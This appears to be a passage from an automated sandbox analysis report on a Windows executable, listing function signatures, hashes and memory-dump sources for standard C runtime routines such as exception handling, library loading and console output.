                                                                                                                                                                      • Instruction Fuzzy Hash: E3618C22E0A7428AFB14DF62D4502BC3BA5EFA0744F445135EA5DA7AD6EF3CE466C304
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Frame$BlockEstablisherHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                      • API String ID: 3606184308-393685449
                                                                                                                                                                      • Opcode ID: ad7ed73937a1dd237070555565f728518e44f666302cee83b44181870f8f7486
                                                                                                                                                                      • Instruction ID: 2a335ccea07fefb80e6ec6fa56fe8105826f356942bfc9c769c46d89203476aa
                                                                                                                                                                      • Opcode Fuzzy Hash: ad7ed73937a1dd237070555565f728518e44f666302cee83b44181870f8f7486
                                                                                                                                                                      • Instruction Fuzzy Hash: 1AD15F72E087458AEB20DB6694412AD7BA0FBA5798F002135FF6D97BD5EF38E061C701
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 65c67ee29b172f3aaf2071a4a3b55cc142d5f95449ac71a6ce88a5a1d0bc4fff
                                                                                                                                                                      • Instruction ID: 96246e32b79dcaf0e2db59354b1aff6b29dcbe26ef462c828a985310092ab87b
                                                                                                                                                                      • Opcode Fuzzy Hash: 65c67ee29b172f3aaf2071a4a3b55cc142d5f95449ac71a6ce88a5a1d0bc4fff
                                                                                                                                                                      • Instruction Fuzzy Hash: 49C1F522E1C69285EB20DB56A80027D6FA4FBF2B80F454131FA6E877D5EE7DE465C300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF6FE10FB7A,?,?,?,00007FF6FE10F7F4,?,?,?,?,00007FF6FE10B8CD), ref: 00007FF6FE10F94F
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF6FE10FB7A,?,?,?,00007FF6FE10F7F4,?,?,?,?,00007FF6FE10B8CD), ref: 00007FF6FE10F95D
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF6FE10FB7A,?,?,?,00007FF6FE10F7F4,?,?,?,?,00007FF6FE10B8CD), ref: 00007FF6FE10F987
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF6FE10FB7A,?,?,?,00007FF6FE10F7F4,?,?,?,?,00007FF6FE10B8CD), ref: 00007FF6FE10F9CD
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF6FE10FB7A,?,?,?,00007FF6FE10F7F4,?,?,?,?,00007FF6FE10B8CD), ref: 00007FF6FE10F9D9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                      • String ID: CONOUT$
                                                                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiStringWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2829165498-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2081738530-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2081738530-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                      • API String ID: 3523768491-393685449
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FE1234F6
                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF6FE123473,?,?,FFFFFFFE,00007FF6FE123EB2), ref: 00007FF6FE1235B4
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF6FE123473,?,?,FFFFFFFE,00007FF6FE123EB2), ref: 00007FF6FE12363E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2210144848-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1087005451-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                      • API String ID: 2775327233-1405518554
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __except_validate_context_record
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      • API String ID: 1467352782-3733052814
                                                                                                                                                                      • Opcode ID: 06ea674547fc63216b6d7ac8eb26704d84d03f3b606f441fc8f5971c62b80142
                                                                                                                                                                      • Instruction ID: 5eab508a9a8cbe6934981b331b278dc4e1fb07b434882d1e38ded86ea576f3aa
                                                                                                                                                                      • Opcode Fuzzy Hash: 06ea674547fc63216b6d7ac8eb26704d84d03f3b606f441fc8f5971c62b80142
                                                                                                                                                                      • Instruction Fuzzy Hash: 3771A472D0868186DF60CF27A45077A7FA0FB94B95F149136EBAD87AC5EE2CD4A0C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-3916222277
                                                                                                                                                                      • Opcode ID: 3fb41e9282136a1e1aaa64fa86120ca5a0f36c0599b42a7a9d033910b2cc34f6
                                                                                                                                                                      • Instruction ID: 96043adfaa9a3716d57124d7e3ea264a9a4c113303b65ca4a80a2925e2c16704
                                                                                                                                                                      • Opcode Fuzzy Hash: 3fb41e9282136a1e1aaa64fa86120ca5a0f36c0599b42a7a9d033910b2cc34f6
                                                                                                                                                                      • Instruction Fuzzy Hash: 20619672D0E61686EB64CF6B805417C3FAAFBB5B48F141139EA5A822D4EF3DE491C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: e+000$gfff
                                                                                                                                                                      • API String ID: 3215553584-3030954782
                                                                                                                                                                      • Opcode ID: 6ebbaa11577a126fcb93d37c1cc9508636a3734f2554967394091e3ebbb75e30
                                                                                                                                                                      • Instruction ID: 66492d5b01d5e2bac4bfc51ebf6ae8e59211ea974eeecb2306ac81866ae542a1
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ebbaa11577a126fcb93d37c1cc9508636a3734f2554967394091e3ebbb75e30
                                                                                                                                                                      • Instruction Fuzzy Hash: FE510562F187C586E731CF7698407696F95EBB0B90F08A231E7A887AD6EE2CD040C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 2558813199-1018135373
                                                                                                                                                                      • Opcode ID: 939ed8649b69eab68203578a43ec588be4449609f0fd757e2dca87993d1536af
                                                                                                                                                                      • Instruction ID: 0348e45b64dd0391eaf790f528247d9cc2f1503d2e1bf08a572815c7fcdcb046
                                                                                                                                                                      • Opcode Fuzzy Hash: 939ed8649b69eab68203578a43ec588be4449609f0fd757e2dca87993d1536af
                                                                                                                                                                      • Instruction Fuzzy Hash: 38518F76A0874286D760DB17E54026E7BA4FBD9B90F001134EBAD87B95EF3CE061CB00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                      • String ID: U
                                                                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                                                                      • Opcode ID: 232f910ff0808134edd1f32a4b488a3ae1fb9451d37860e42ff9a1fba1430121
                                                                                                                                                                      • Instruction ID: 4c4ccb52f86082f9a1d774550d38cc5455a242aa23f254f138fce6d7178e03a2
                                                                                                                                                                      • Opcode Fuzzy Hash: 232f910ff0808134edd1f32a4b488a3ae1fb9451d37860e42ff9a1fba1430121
                                                                                                                                                                      • Instruction Fuzzy Hash: D041B422F18A4281EB20CF26E8443AA6B60FBA5B84F404131EE5DC7798EF3CD541C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _handle_errorf
                                                                                                                                                                      • String ID: "$powf
                                                                                                                                                                      • API String ID: 2315412904-603753351
                                                                                                                                                                      • Opcode ID: aab90d8fa0024c78f9f5f30e235444de17b336a26878e8c18280b7e4ef85d04e
                                                                                                                                                                      • Instruction ID: 2c75cd3944c2b658185542f23dc50a7afe54b19891e8ea966f9a8b5eb3698d0c
                                                                                                                                                                      • Opcode Fuzzy Hash: aab90d8fa0024c78f9f5f30e235444de17b336a26878e8c18280b7e4ef85d04e
                                                                                                                                                                      • Instruction Fuzzy Hash: D1413D72D28681DBD370CF22E4847A9BAA0F7EA348F101325F759429E8DF79C5509B04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                      • String ID: ios_base::failbit set
                                                                                                                                                                      • API String ID: 1109970293-3924258884
                                                                                                                                                                      • Opcode ID: a488108b85d08225bfa3b687b9050c41ae30d86a11950ce15bfff4045a624ae7
                                                                                                                                                                      • Instruction ID: d1358c9256e202b851bb49b572bcd29e264a955d65aa0be0cf50762fa0a8ddac
                                                                                                                                                                      • Opcode Fuzzy Hash: a488108b85d08225bfa3b687b9050c41ae30d86a11950ce15bfff4045a624ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: FA318362E18B8681EB118B25E4403A96760FBE9764F546331FBAC427D5EF6CD1D4C340
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _handle_error
                                                                                                                                                                      • String ID: "$pow
                                                                                                                                                                      • API String ID: 1757819995-713443511
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_errno_from_matherr
                                                                                                                                                                      • String ID: exp
                                                                                                                                                                      • API String ID: 1187470696-113136155
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CompareStringtry_get_function
                                                                                                                                                                      • String ID: CompareStringEx
                                                                                                                                                                      • API String ID: 3328479835-2590796910
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

